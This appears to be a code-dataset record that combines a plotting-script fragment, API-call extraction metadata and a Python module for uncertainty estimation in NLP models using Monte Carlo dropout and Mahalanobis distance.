text_plot5 = f'$\sigma_1$={sigma_uncorr[4][0]}, $\sigma_2$={sigma_uncorr[4][1]} and $\sigma_3$={sigma_corr[4][2]}.'
ax[1, 1].hist(phis5_corr, bins=np.linspace(0, 1, 22), alpha=0.5, edgecolor='k', color=c[2], rwidth=0.9, label='correlated')
ax[1, 1].hist(phis5_uncorr, bins=np.linspace(0, 1, 22), alpha=0.5, edgecolor='k', color=c[-3], rwidth=0.9, label='uncorrelated')
ax[1, 1].legend(loc='upper right', prop={'size': 8})
ax[1, 1].set_title(text_plot5, size=10)
text_plot6 = f'$\sigma_1$={sigma_uncorr[5][0]}, $\sigma_2$={sigma_uncorr[5][1]} and $\sigma_3$={sigma_corr[5][2]}.'
ax[1, 2].hist(phis6_corr, bins=np.linspace(0, 1, 22), alpha=0.5, edgecolor='k', color=c[2], rwidth=0.9, label='correlated')
ax[1, 2].hist(phis6_uncorr, bins=np.linspace(0, 1, 22), alpha=0.5, edgecolor='k', color=c[-3], rwidth=0.9, label='uncorrelated')
ax[1, 2].legend(loc='upper right', prop={'size': 8})
ax[1, 2].set_title(text_plot6, size=10)
plt.tight_layout()
#plt.savefig('un_vs_correlated.svg')
plt.show()
|
[
"numpy.random.seed",
"matplotlib.pyplot.show",
"math.sqrt",
"matplotlib.pyplot.ylim",
"numpy.random.randn",
"matplotlib.pyplot.subplots",
"numpy.array",
"pandas.Series",
"numpy.linspace",
"matplotlib.pyplot.tight_layout"
] |
[((436, 452), 'numpy.random.seed', 'np.random.seed', ([], {}), '()\n', (450, 452), True, 'import numpy as np\n'), ((4708, 4729), 'pandas.Series', 'pd.Series', (['phis1_corr'], {}), '(phis1_corr)\n', (4717, 4729), True, 'import pandas as pd\n'), ((4743, 4764), 'pandas.Series', 'pd.Series', (['phis2_corr'], {}), '(phis2_corr)\n', (4752, 4764), True, 'import pandas as pd\n'), ((4778, 4799), 'pandas.Series', 'pd.Series', (['phis3_corr'], {}), '(phis3_corr)\n', (4787, 4799), True, 'import pandas as pd\n'), ((4813, 4834), 'pandas.Series', 'pd.Series', (['phis4_corr'], {}), '(phis4_corr)\n', (4822, 4834), True, 'import pandas as pd\n'), ((4848, 4869), 'pandas.Series', 'pd.Series', (['phis5_corr'], {}), '(phis5_corr)\n', (4857, 4869), True, 'import pandas as pd\n'), ((4883, 4904), 'pandas.Series', 'pd.Series', (['phis6_corr'], {}), '(phis6_corr)\n', (4892, 4904), True, 'import pandas as pd\n'), ((5619, 5642), 'pandas.Series', 'pd.Series', (['phis1_uncorr'], {}), '(phis1_uncorr)\n', (5628, 5642), True, 'import pandas as pd\n'), ((5658, 5681), 'pandas.Series', 'pd.Series', (['phis2_uncorr'], {}), '(phis2_uncorr)\n', (5667, 5681), True, 'import pandas as pd\n'), ((5697, 5720), 'pandas.Series', 'pd.Series', (['phis3_uncorr'], {}), '(phis3_uncorr)\n', (5706, 5720), True, 'import pandas as pd\n'), ((5736, 5759), 'pandas.Series', 'pd.Series', (['phis4_uncorr'], {}), '(phis4_uncorr)\n', (5745, 5759), True, 'import pandas as pd\n'), ((5775, 5798), 'pandas.Series', 'pd.Series', (['phis5_uncorr'], {}), '(phis5_uncorr)\n', (5784, 5798), True, 'import pandas as pd\n'), ((5814, 5837), 'pandas.Series', 'pd.Series', (['phis6_uncorr'], {}), '(phis6_uncorr)\n', (5823, 5837), True, 'import pandas as pd\n'), ((5849, 5912), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(2)', '(3)'], {'figsize': '(10, 5)', 'sharex': '"""col"""', 'sharey': '"""row"""'}), "(2, 3, figsize=(10, 5), sharex='col', sharey='row')\n", (5861, 5912), True, 'import matplotlib.pyplot as plt\n'), ((5913, 5930), 'matplotlib.pyplot.ylim', 'plt.ylim', (['(0)', '(1000)'], {}), '(0, 1000)\n', (5921, 5930), True, 'import matplotlib.pyplot as plt\n'), ((9070, 9088), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (9086, 9088), True, 'import matplotlib.pyplot as plt\n'), ((9126, 9136), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (9134, 9136), True, 'import matplotlib.pyplot as plt\n'), ((685, 702), 'numpy.random.randn', 'np.random.randn', ([], {}), '()\n', (700, 702), True, 'import numpy as np\n'), ((730, 747), 'numpy.random.randn', 'np.random.randn', ([], {}), '()\n', (745, 747), True, 'import numpy as np\n'), ((775, 792), 'numpy.random.randn', 'np.random.randn', ([], {}), '()\n', (790, 792), True, 'import numpy as np\n'), ((3921, 3935), 'numpy.array', 'np.array', (['phis'], {}), '(phis)\n', (3929, 3935), True, 'import numpy as np\n'), ((6439, 6460), 'numpy.linspace', 'np.linspace', (['(0)', '(1)', '(22)'], {}), '(0, 1, 22)\n', (6450, 6460), True, 'import numpy as np\n'), ((6565, 6586), 'numpy.linspace', 'np.linspace', (['(0)', '(1)', '(22)'], {}), '(0, 1, 22)\n', (6576, 6586), True, 'import numpy as np\n'), ((6902, 6923), 'numpy.linspace', 'np.linspace', (['(0)', '(1)', '(22)'], {}), '(0, 1, 22)\n', (6913, 6923), True, 'import numpy as np\n'), ((7028, 7049), 'numpy.linspace', 'np.linspace', (['(0)', '(1)', '(22)'], {}), '(0, 1, 22)\n', (7039, 7049), True, 'import numpy as np\n'), ((7365, 7386), 'numpy.linspace', 'np.linspace', (['(0)', '(1)', '(22)'], {}), '(0, 1, 22)\n', (7376, 7386), True, 'import numpy as np\n'), ((7491, 7512), 'numpy.linspace', 'np.linspace', (['(0)', '(1)', '(22)'], {}), '(0, 1, 22)\n', (7502, 7512), True, 'import numpy as np\n'), ((7828, 7849), 'numpy.linspace', 'np.linspace', (['(0)', '(1)', '(22)'], {}), '(0, 1, 22)\n', (7839, 7849), True, 'import numpy as np\n'), ((7954, 7975), 'numpy.linspace', 'np.linspace', (['(0)', '(1)', '(22)'], {}), '(0, 1, 22)\n', (7965, 7975), True, 'import numpy as np\n'), ((8291, 8312), 'numpy.linspace', 'np.linspace', (['(0)', '(1)', '(22)'], {}), '(0, 1, 22)\n', (8302, 8312), True, 'import numpy as np\n'), ((8417, 8438), 'numpy.linspace', 'np.linspace', (['(0)', '(1)', '(22)'], {}), '(0, 1, 22)\n', (8428, 8438), True, 'import numpy as np\n'), ((8754, 8775), 'numpy.linspace', 'np.linspace', (['(0)', '(1)', '(22)'], {}), '(0, 1, 22)\n', (8765, 8775), True, 'import numpy as np\n'), ((8880, 8901), 'numpy.linspace', 'np.linspace', (['(0)', '(1)', '(22)'], {}), '(0, 1, 22)\n', (8891, 8901), True, 'import numpy as np\n'), ((671, 684), 'math.sqrt', 'math.sqrt', (['dt'], {}), '(dt)\n', (680, 684), True, 'import math as math\n'), ((716, 729), 'math.sqrt', 'math.sqrt', (['dt'], {}), '(dt)\n', (725, 729), True, 'import math as math\n'), ((761, 774), 'math.sqrt', 'math.sqrt', (['dt'], {}), '(dt)\n', (770, 774), True, 'import math as math\n')]
|
import torch
from ue4nlp.dropconnect_mc import (
LinearDropConnectMC,
activate_mc_dropconnect,
convert_to_mc_dropconnect,
hide_dropout,
)
from ue4nlp.dropout_mc import DropoutMC, activate_mc_dropout, convert_to_mc_dropout
from utils.utils_dropout import set_last_dropout, get_last_dropout, set_last_dropconnect
from utils.utils_heads import (
ElectraClassificationHeadIdentityPooler,
BertClassificationHeadIdentityPooler,
ElectraNERHeadIdentityPooler,
XLNetClassificationHeadIdentityPooler,
)
from utils.utils_inference import (
is_custom_head,
unpad_features,
pad_scores
)
from ue4nlp.mahalanobis_distance import (
mahalanobis_distance,
mahalanobis_distance_relative,
mahalanobis_distance_marginal,
compute_centroids,
compute_covariance
)
import numpy as np
import copy
from tqdm import tqdm
import time
import logging
log = logging.getLogger()
def convert_dropouts(model, ue_args):
if ue_args.dropout_type == "MC":
dropout_ctor = lambda p, activate: DropoutMC(
p=ue_args.inference_prob, activate=False
)
elif ue_args.dropout_type == "DC_MC":
dropout_ctor = lambda linear, activate: LinearDropConnectMC(
linear=linear, p_dropconnect=ue_args.inference_prob, activate=activate
)
else:
raise ValueError(f"Wrong dropout type: {ue_args.dropout_type}")
if (ue_args.dropout_subs == "all") and (ue_args.dropout_type == "DC_MC"):
convert_to_mc_dropconnect(
model.electra.encoder, {"Linear": dropout_ctor}
) # TODO: check encoder or all dropouts ?
hide_dropout(model.electra.encoder)
elif (ue_args.dropout_subs == "last") and (ue_args.dropout_type == "DC_MC"):
set_last_dropconnect(model, dropout_ctor)
hide_dropout(model.classifier)
elif ue_args.dropout_subs == "last":
set_last_dropout(model, dropout_ctor(p=ue_args.inference_prob, activate=False))
elif ue_args.dropout_subs == "all":
convert_to_mc_dropout(model, {"Dropout": dropout_ctor})
else:
raise ValueError(f"Wrong ue args {ue_args.dropout_subs}")
class UeEstimatorMSD:
def __init__(
self, cls, config, ue_args, eval_metric, calibration_dataset, train_dataset
):
self.cls = cls
self.ue_args = ue_args
self.calibration_dataset = calibration_dataset
self.eval_metric = eval_metric
self.train_dataset = train_dataset
self.config = config
def fit_ue(self, X, y=None, X_test=None):
cls = self.cls
model = self.cls._auto_model
log.info("****************Start fitting covariance and centroids **************")
if y is None:
y = self._exctract_labels(X)
self._replace_model_head()
X_features = self._exctract_features(X)
self.class_cond_centroids = self._fit_centroids(X_features, y)
self.class_cond_covarince = self._fit_covariance(X_features, y)
self._restore_model_head()
log.info("**************Done.**********************")
def _fit_covariance(self, X, y, class_cond=True):
if class_cond:
return compute_covariance(self.class_cond_centroids, X, y, class_cond)
return compute_covariance(self.train_centroid, X, y, class_cond)
def _fit_centroids(self, X, y, class_cond=True):
return compute_centroids(X, y, class_cond)
def _replace_model_head(self):
cls = self.cls
model = self.cls._auto_model
self.old_classifier = copy.deepcopy(model.classifier)
use_paper_version = self.ue_args.get("use_paper_version", False)
use_activation = not use_paper_version
if is_custom_head(model):
model.classifier = ElectraClassificationHeadIdentityPooler(model.classifier, use_activation)
elif "xlnet" in self.config.model.model_name_or_path:
# so XLNet hasn't classifier, we replace sequence_summary and logits_proj
self.cls.model.logits_proj = XLNetClassificationHeadIdentityPooler()
else:
model.classifier = BertClassificationHeadIdentityPooler(model.classifier)
def _restore_model_head(self):
model = self.cls._auto_model
model.classifier = self.old_classifier
def _exctract_labels(self, X):
return np.asarray([example["label"] for example in X])
def _exctract_features(self, X):
cls = self.cls
model = self.cls._auto_model
try:
X = X.remove_columns("label")
except:
X.dataset = X.dataset.remove_columns("label")
X_features = cls.predict(X, apply_softmax=False, return_preds=False)[0]
return X_features
def _calc_distinctivness_score(self, full_mahalanobis_distance, eval_labels, eval_results):
start_unc = time.time()
min_mahalanobis_distance = np.min(full_mahalanobis_distance, axis=-1)
# calc penalty
penalty = self.config.mixup.margin * np.where(
eval_labels == np.argmin(full_mahalanobis_distance, axis=-1), 0, 1
)
dist_score = np.log10(
self.config.mixup.beta1 * penalty
+ self.config.mixup.beta2 * min_mahalanobis_distance
)
# after calc uncertainty score
max_probs = np.max(
np.mean(np.asarray(eval_results["sampled_probabilities"]), axis=0), axis=-1
)
uncertainty_score = (
self.config.mixup.gamma1 / max_probs + self.config.mixup.gamma2 * dist_score
)
end_unc = time.time()
eval_results["uncertainty_score"] = uncertainty_score.tolist()
return eval_results, end_unc - start_unc
def _predict_with_fitted_cov(self, X, y, eval_results):
cls = self.cls
model = self.cls._auto_model
self._replace_model_head()
log.info("****************Compute MD with fitted covariance and centroids **************")
start = time.time()
if y is None:
y = self._exctract_labels(X)
X_features = self._exctract_features(X)
end = time.time()
md, inf_time = mahalanobis_distance(None, None, X_features,
self.class_cond_centroids, self.class_cond_covarince, True)
sum_inf_time = inf_time + (end - start)
eval_results["mahalanobis_distance"] = md.tolist()
self._restore_model_head()
log.info("**************Done.**********************")
return eval_results, md, sum_inf_time
def _activate_dropouts(self, model):
ue_args = self.ue_args
log.info("******Perform stochastic inference...*******")
if ue_args.dropout_type == "DC_MC":
activate_mc_dropconnect(model, activate=True, random=ue_args.inference_prob)
else:
convert_dropouts(model, ue_args)
activate_mc_dropout(model, activate=True, random=ue_args.inference_prob)
if ue_args.use_cache:
log.info("Caching enabled.")
model.enable_cache()
return model
def _deactivate_dropouts(self, model):
activate_mc_dropout(model, activate=False)
activate_mc_dropconnect(model, activate=False)
return model
def _predict_mc(self, X, y):
ue_args = self.ue_args
eval_metric = self.eval_metric
model = self.cls._auto_model
start = time.time()
model = self._activate_dropouts(model)
eval_results = {}
eval_results["sampled_probabilities"] = []
eval_results["sampled_answers"] = []
log.info("****************Start runs**************")
for i in tqdm(range(ue_args.committee_size)):
preds, probs = self.cls.predict(X)[:2]
eval_results["sampled_probabilities"].append(probs.tolist())
eval_results["sampled_answers"].append(preds.tolist())
if ue_args.eval_passes:
eval_score = eval_metric.compute(
predictions=preds, references=true_labels
)
log.info(f"Eval score: {eval_score}")
end = time.time()
log.info("**************Done.********************")
model = self._deactivate_dropouts(model)
return eval_results, end - start
def _predict_msd(self, X, y):
ue_args = self.ue_args
model = self.cls._auto_model
if y is None:
y = self._exctract_labels(X)
eval_results, mc_time = self._predict_mc(X, y)
eval_results, full_mahalanobis_distance, md_time = self._predict_with_fitted_cov(X, y, eval_results)
eval_results["eval_labels"] = y
# so now we have sampled probs and mahalanobis distances in eval_preds
# we have to calc distinctivness score and uncertainty scores
eval_results, unc_time = self._calc_distinctivness_score(full_mahalanobis_distance, y, eval_results)
sum_inf_time = mc_time + md_time + unc_time
eval_results["ue_time"] = sum_inf_time
log.info(f"UE time: {sum_inf_time}")
return eval_results
def __call__(self, X, y):
return self._predict_msd(X, y)
class UeEstimatorMSDNer:
def __init__(
self, cls, config, ue_args, eval_metric, calibration_dataset, train_dataset
):
self.cls = cls
self.ue_args = ue_args
self.calibration_dataset = calibration_dataset
self.eval_metric = eval_metric
self.train_dataset = train_dataset
self.config = config
def fit_ue(self, X, y=None, X_test=None):
cls = self.cls
model = self.cls._auto_model
log.info("****************Start fitting covariance and centroids **************")
if y is None:
y, y_shape = self._exctract_labels(X)
self._replace_model_head()
X_features = self._exctract_features(X)
self.class_cond_centroids = self._fit_centroids(X_features, y)
self.class_cond_covarince = self._fit_covariance(X_features, y)
self._restore_model_head()
log.info("**************Done.**********************")
def _fit_covariance(self, X, y, class_cond=True):
if class_cond:
return compute_covariance(self.class_cond_centroids, X, y, class_cond)
return compute_covariance(self.train_centroid, X, y, class_cond)
def _fit_centroids(self, X, y, class_cond=True):
return compute_centroids(X, y, class_cond)
def _replace_model_head(self):
cls = self.cls
model = self.cls._auto_model
self.old_classifier = copy.deepcopy(model.classifier)
use_paper_version = self.ue_args.get("use_paper_version", False)
use_activation = not use_paper_version
if is_custom_head(model):
model.classifier = ElectraNERHeadIdentityPooler(model.classifier, use_activation)
else:
model.classifier = BertClassificationHeadIdentityPooler(model.classifier)
def _restore_model_head(self):
model = self.cls._auto_model
model.classifier = self.old_classifier
def _exctract_labels(self, X):
y = np.asarray([example["labels"] for example in X])
y_shape = y.shape
return y.reshape(-1), y_shape
def _exctract_features(self, X):
cls = self.cls
model = self.cls._auto_model
try:
X = X.remove_columns("labels")
except:
X.dataset = X.dataset.remove_columns("labels")
X_features = cls.predict(X, apply_softmax=False, return_preds=False)[0]
X_features = X_features.reshape(-1, X_features.shape[-1])
return X_features
def _calc_distinctivness_score(self, full_mahalanobis_distance, eval_labels, eval_shape, eval_results):
start_unc = time.time()
min_mahalanobis_distance = np.min(full_mahalanobis_distance, axis=-1).reshape(
eval_shape
)
# calc penalty
penalty = self.config.mixup.margin * np.where(
eval_labels
== np.argmin(full_mahalanobis_distance, axis=-1).reshape(eval_shape),
0,
1,
)
dist_score = np.log10(
self.config.mixup.beta1 * penalty
+ self.config.mixup.beta2 * min_mahalanobis_distance
)
# after calc uncertainty score
max_probs = np.max(
np.mean(np.asarray(eval_results["sampled_probabilities"]), axis=0), axis=-1
)
uncertainty_score = (
self.config.mixup.gamma1 / max_probs + self.config.mixup.gamma2 * dist_score
)
end_unc = time.time()
eval_results["uncertainty_score"] = uncertainty_score.tolist()
return eval_results, end_unc - start_unc
def _predict_with_fitted_cov(self, X, y, eval_results):
cls = self.cls
model = self.cls._auto_model
self._replace_model_head()
log.info("****************Compute MD with fitted covariance and centroids **************")
start = time.time()
y_pad, y_shape = self._exctract_labels(X)
X_features = self._exctract_features(X)
end = time.time()
md, inf_time = mahalanobis_distance(None, None, X_features,
self.class_cond_centroids, self.class_cond_covarince, True)
sum_inf_time = inf_time + (end - start)
eval_results["mahalanobis_distance"] = md.tolist()
self._restore_model_head()
log.info("**************Done.**********************")
return eval_results, md, sum_inf_time
def _activate_dropouts(self, model):
ue_args = self.ue_args
log.info("******Perform stochastic inference...*******")
if ue_args.dropout_type == "DC_MC":
activate_mc_dropconnect(model, activate=True, random=ue_args.inference_prob)
else:
convert_dropouts(model, ue_args)
activate_mc_dropout(model, activate=True, random=ue_args.inference_prob)
if ue_args.use_cache:
log.info("Caching enabled.")
model.enable_cache()
return model
def _deactivate_dropouts(self, model):
activate_mc_dropout(model, activate=False)
activate_mc_dropconnect(model, activate=False)
return model
def _predict_mc(self, X, y):
ue_args = self.ue_args
eval_metric = self.eval_metric
model = self.cls._auto_model
start = time.time()
model = self._activate_dropouts(model)
eval_results = {}
eval_results["sampled_probabilities"] = []
eval_results["sampled_answers"] = []
log.info("****************Start runs**************")
for i in tqdm(range(ue_args.committee_size)):
preds, probs = self.cls.predict(X)[:2]
eval_results["sampled_probabilities"].append(probs.tolist())
eval_results["sampled_answers"].append(preds.tolist())
if ue_args.eval_passes:
eval_score = eval_metric.compute(
predictions=preds, references=true_labels
)
log.info(f"Eval score: {eval_score}")
end = time.time()
log.info("**************Done.********************")
model = self._deactivate_dropouts(model)
return eval_results, end - start
def _predict_msd(self, X, y):
ue_args = self.ue_args
model = self.cls._auto_model
y_pad, y_shape = self._exctract_labels(X)
eval_results, mc_time = self._predict_mc(X, y)
eval_results, full_mahalanobis_distance, md_time = self._predict_with_fitted_cov(X, y, eval_results)
eval_results["eval_labels"] = y
# so now we have sampled probs and mahalanobis distances in eval_preds
# we have to calc distinctivness score and uncertainty scores
eval_results, unc_time = self._calc_distinctivness_score(full_mahalanobis_distance, y_pad, y_shape, eval_results)
sum_inf_time = mc_time + md_time + unc_time
eval_results["ue_time"] = sum_inf_time
log.info(f"UE time: {sum_inf_time}")
return eval_results
def __call__(self, X, y):
return self._predict_msd(X, y)
|
[
"ue4nlp.dropconnect_mc.activate_mc_dropconnect",
"numpy.argmin",
"ue4nlp.mahalanobis_distance.compute_covariance",
"ue4nlp.mahalanobis_distance.compute_centroids",
"utils.utils_heads.BertClassificationHeadIdentityPooler",
"utils.utils_inference.is_custom_head",
"ue4nlp.dropconnect_mc.convert_to_mc_dropconnect",
"numpy.log10",
"ue4nlp.dropconnect_mc.LinearDropConnectMC",
"ue4nlp.dropout_mc.activate_mc_dropout",
"copy.deepcopy",
"utils.utils_heads.XLNetClassificationHeadIdentityPooler",
"numpy.asarray",
"numpy.min",
"ue4nlp.dropout_mc.convert_to_mc_dropout",
"utils.utils_heads.ElectraClassificationHeadIdentityPooler",
"utils.utils_dropout.set_last_dropconnect",
"ue4nlp.dropout_mc.DropoutMC",
"utils.utils_heads.ElectraNERHeadIdentityPooler",
"ue4nlp.dropconnect_mc.hide_dropout",
"time.time",
"ue4nlp.mahalanobis_distance.mahalanobis_distance",
"logging.getLogger"
] |
[((893, 912), 'logging.getLogger', 'logging.getLogger', ([], {}), '()\n', (910, 912), False, 'import logging\n'), ((1482, 1556), 'ue4nlp.dropconnect_mc.convert_to_mc_dropconnect', 'convert_to_mc_dropconnect', (['model.electra.encoder', "{'Linear': dropout_ctor}"], {}), "(model.electra.encoder, {'Linear': dropout_ctor})\n", (1507, 1556), False, 'from ue4nlp.dropconnect_mc import LinearDropConnectMC, activate_mc_dropconnect, convert_to_mc_dropconnect, hide_dropout\n'), ((1628, 1663), 'ue4nlp.dropconnect_mc.hide_dropout', 'hide_dropout', (['model.electra.encoder'], {}), '(model.electra.encoder)\n', (1640, 1663), False, 'from ue4nlp.dropconnect_mc import LinearDropConnectMC, activate_mc_dropconnect, convert_to_mc_dropconnect, hide_dropout\n'), ((3316, 3373), 'ue4nlp.mahalanobis_distance.compute_covariance', 'compute_covariance', (['self.train_centroid', 'X', 'y', 'class_cond'], {}), '(self.train_centroid, X, y, class_cond)\n', (3334, 3373), False, 'from ue4nlp.mahalanobis_distance import mahalanobis_distance, mahalanobis_distance_relative, mahalanobis_distance_marginal, compute_centroids, compute_covariance\n'), ((3451, 3486), 'ue4nlp.mahalanobis_distance.compute_centroids', 'compute_centroids', (['X', 'y', 'class_cond'], {}), '(X, y, class_cond)\n', (3468, 3486), False, 'from ue4nlp.mahalanobis_distance import mahalanobis_distance, mahalanobis_distance_relative, mahalanobis_distance_marginal, compute_centroids, compute_covariance\n'), ((3620, 3651), 'copy.deepcopy', 'copy.deepcopy', (['model.classifier'], {}), '(model.classifier)\n', (3633, 3651), False, 'import copy\n'), ((3792, 3813), 'utils.utils_inference.is_custom_head', 'is_custom_head', (['model'], {}), '(model)\n', (3806, 3813), False, 'from utils.utils_inference import is_custom_head, unpad_features, pad_scores\n'), ((4424, 4471), 'numpy.asarray', 'np.asarray', (["[example['label'] for example in X]"], {}), "([example['label'] for example in X])\n", (4434, 4471), True, 'import numpy as np\n'), ((4948, 4959), 'time.time', 'time.time', ([], {}), '()\n', (4957, 4959), False, 'import time\n'), ((4995, 5037), 'numpy.min', 'np.min', (['full_mahalanobis_distance'], {'axis': '(-1)'}), '(full_mahalanobis_distance, axis=-1)\n', (5001, 5037), True, 'import numpy as np\n'), ((5226, 5326), 'numpy.log10', 'np.log10', (['(self.config.mixup.beta1 * penalty + self.config.mixup.beta2 *\n min_mahalanobis_distance)'], {}), '(self.config.mixup.beta1 * penalty + self.config.mixup.beta2 *\n min_mahalanobis_distance)\n', (5234, 5326), True, 'import numpy as np\n'), ((5669, 5680), 'time.time', 'time.time', ([], {}), '()\n', (5678, 5680), False, 'import time\n'), ((6082, 6093), 'time.time', 'time.time', ([], {}), '()\n', (6091, 6093), False, 'import time\n'), ((6219, 6230), 'time.time', 'time.time', ([], {}), '()\n', (6228, 6230), False, 'import time\n'), ((6263, 6371), 'ue4nlp.mahalanobis_distance.mahalanobis_distance', 'mahalanobis_distance', (['None', 'None', 'X_features', 'self.class_cond_centroids', 'self.class_cond_covarince', '(True)'], {}), '(None, None, X_features, self.class_cond_centroids,\n self.class_cond_covarince, True)\n', (6283, 6371), False, 'from ue4nlp.mahalanobis_distance import mahalanobis_distance, mahalanobis_distance_relative, mahalanobis_distance_marginal, compute_centroids, compute_covariance\n'), ((7258, 7300), 'ue4nlp.dropout_mc.activate_mc_dropout', 'activate_mc_dropout', (['model'], {'activate': '(False)'}), '(model, activate=False)\n', (7277, 7300), False, 'from ue4nlp.dropout_mc import DropoutMC, activate_mc_dropout, convert_to_mc_dropout\n'), ((7309, 7355), 'ue4nlp.dropconnect_mc.activate_mc_dropconnect', 'activate_mc_dropconnect', (['model'], {'activate': '(False)'}), '(model, activate=False)\n', (7332, 7355), False, 'from ue4nlp.dropconnect_mc import LinearDropConnectMC, activate_mc_dropconnect, convert_to_mc_dropconnect, hide_dropout\n'), ((7535, 7546), 'time.time', 'time.time', ([], {}), '()\n', (7544, 7546), False, 'import time\n'), ((8261, 8272), 'time.time', 'time.time', ([], {}), '()\n', (8270, 8272), False, 'import time\n'), ((10462, 10519), 'ue4nlp.mahalanobis_distance.compute_covariance', 'compute_covariance', (['self.train_centroid', 'X', 'y', 'class_cond'], {}), '(self.train_centroid, X, y, class_cond)\n', (10480, 10519), False, 'from ue4nlp.mahalanobis_distance import mahalanobis_distance, mahalanobis_distance_relative, mahalanobis_distance_marginal, compute_centroids, compute_covariance\n'), ((10597, 10632), 'ue4nlp.mahalanobis_distance.compute_centroids', 'compute_centroids', (['X', 'y', 'class_cond'], {}), '(X, y, class_cond)\n', (10614, 10632), False, 'from ue4nlp.mahalanobis_distance import mahalanobis_distance, mahalanobis_distance_relative, mahalanobis_distance_marginal, compute_centroids, compute_covariance\n'), ((10766, 10797), 'copy.deepcopy', 'copy.deepcopy', (['model.classifier'], {}), '(model.classifier)\n', (10779, 10797), False, 'import copy\n'), ((10938, 10959), 'utils.utils_inference.is_custom_head', 'is_custom_head', (['model'], {}), '(model)\n', (10952, 10959), False, 'from utils.utils_inference import is_custom_head, unpad_features, pad_scores\n'), ((11327, 11375), 'numpy.asarray', 'np.asarray', (["[example['labels'] for example in X]"], {}), "([example['labels'] for example in X])\n", (11337, 11375), True, 'import numpy as np\n'), ((12014, 12025), 'time.time', 'time.time', ([], {}), '()\n', (12023, 12025), False, 'import time\n'), ((12391, 12491), 'numpy.log10', 'np.log10', (['(self.config.mixup.beta1 * penalty + self.config.mixup.beta2 *\n min_mahalanobis_distance)'], {}), '(self.config.mixup.beta1 * penalty + self.config.mixup.beta2 *\n min_mahalanobis_distance)\n', (12399, 12491), True, 'import numpy as np\n'), ((12834, 12845), 'time.time', 'time.time', ([], {}), '()\n', (12843, 12845), False, 'import time\n'), ((13247, 13258), 'time.time', 'time.time', ([], {}), '()\n', (13256, 13258), False, 'import time\n'), ((13381, 13392), 'time.time', 'time.time', ([], {}), '()\n', (13390, 13392), False, 'import time\n'), ((13425, 13533), 'ue4nlp.mahalanobis_distance.mahalanobis_distance', 'mahalanobis_distance', (['None', 'None', 'X_features', 'self.class_cond_centroids', 'self.class_cond_covarince', '(True)'], {}), '(None, None, X_features, self.class_cond_centroids,\n self.class_cond_covarince, True)\n', (13445, 13533), False, 'from ue4nlp.mahalanobis_distance import mahalanobis_distance, mahalanobis_distance_relative, mahalanobis_distance_marginal, compute_centroids, compute_covariance\n'), ((14421, 14463), 'ue4nlp.dropout_mc.activate_mc_dropout', 'activate_mc_dropout', (['model'], {'activate': '(False)'}), '(model, activate=False)\n', (14440, 14463), False, 'from ue4nlp.dropout_mc import DropoutMC, activate_mc_dropout, convert_to_mc_dropout\n'), ((14472, 14518), 'ue4nlp.dropconnect_mc.activate_mc_dropconnect', 'activate_mc_dropconnect', (['model'], {'activate': '(False)'}), '(model, activate=False)\n', (14495, 14518), False, 'from ue4nlp.dropconnect_mc import LinearDropConnectMC, activate_mc_dropconnect, convert_to_mc_dropconnect, hide_dropout\n'), ((14698, 14709), 'time.time', 'time.time', ([], {}), '()\n', (14707, 14709), False, 'import time\n'), ((15424, 15435), 'time.time', 'time.time', ([], {}), '()\n', (15433, 15435), False, 'import time\n'), ((1033, 1084), 'ue4nlp.dropout_mc.DropoutMC', 'DropoutMC', ([], {'p': 'ue_args.inference_prob', 'activate': '(False)'}), '(p=ue_args.inference_prob, activate=False)\n', (1042, 1084), False, 'from ue4nlp.dropout_mc import DropoutMC, activate_mc_dropout, convert_to_mc_dropout\n'), ((1754, 1795), 'utils.utils_dropout.set_last_dropconnect', 'set_last_dropconnect', (['model', 'dropout_ctor'], {}), '(model, dropout_ctor)\n', (1774, 1795), False, 'from utils.utils_dropout import set_last_dropout, get_last_dropout, set_last_dropconnect\n'), ((1804, 1834), 'ue4nlp.dropconnect_mc.hide_dropout', 'hide_dropout', (['model.classifier'], {}), '(model.classifier)\n', (1816, 1834), False, 'from ue4nlp.dropconnect_mc import LinearDropConnectMC, activate_mc_dropconnect, convert_to_mc_dropconnect, hide_dropout\n'), ((3237, 3300), 'ue4nlp.mahalanobis_distance.compute_covariance', 'compute_covariance', (['self.class_cond_centroids', 'X', 'y', 'class_cond'], {}), '(self.class_cond_centroids, X, y, class_cond)\n', (3255, 3300), False, 'from ue4nlp.mahalanobis_distance import mahalanobis_distance, mahalanobis_distance_relative, mahalanobis_distance_marginal, compute_centroids, compute_covariance\n'), ((3846, 3919), 'utils.utils_heads.ElectraClassificationHeadIdentityPooler', 'ElectraClassificationHeadIdentityPooler', (['model.classifier', 'use_activation'], {}), '(model.classifier, use_activation)\n', (3885, 3919), False, 'from utils.utils_heads import ElectraClassificationHeadIdentityPooler, BertClassificationHeadIdentityPooler, ElectraNERHeadIdentityPooler, XLNetClassificationHeadIdentityPooler\n'), ((6859, 6935), 'ue4nlp.dropconnect_mc.activate_mc_dropconnect', 'activate_mc_dropconnect', (['model'], {'activate': '(True)', 'random': 'ue_args.inference_prob'}), '(model, activate=True, random=ue_args.inference_prob)\n', (6882, 6935), False, 'from ue4nlp.dropconnect_mc import LinearDropConnectMC, activate_mc_dropconnect, convert_to_mc_dropconnect, hide_dropout\n'), ((7007, 7079), 'ue4nlp.dropout_mc.activate_mc_dropout', 'activate_mc_dropout', (['model'], {'activate': '(True)', 'random': 'ue_args.inference_prob'}), '(model, activate=True, random=ue_args.inference_prob)\n', (7026, 7079), False, 'from ue4nlp.dropout_mc import DropoutMC, activate_mc_dropout, convert_to_mc_dropout\n'), ((10383, 10446), 'ue4nlp.mahalanobis_distance.compute_covariance', 'compute_covariance', (['self.class_cond_centroids', 'X', 'y', 'class_cond'], {}), '(self.class_cond_centroids, X, y, class_cond)\n', (10401, 10446), False, 'from ue4nlp.mahalanobis_distance import mahalanobis_distance, mahalanobis_distance_relative, mahalanobis_distance_marginal, compute_centroids, compute_covariance\n'), ((10992, 11054), 'utils.utils_heads.ElectraNERHeadIdentityPooler', 'ElectraNERHeadIdentityPooler', (['model.classifier', 'use_activation'], {}), '(model.classifier, use_activation)\n', (11020, 11054), False, 'from utils.utils_heads import ElectraClassificationHeadIdentityPooler, BertClassificationHeadIdentityPooler, ElectraNERHeadIdentityPooler, XLNetClassificationHeadIdentityPooler\n'), ((11100, 11154), 'utils.utils_heads.BertClassificationHeadIdentityPooler', 'BertClassificationHeadIdentityPooler', (['model.classifier'], {}), '(model.classifier)\n', (11136, 11154), False, 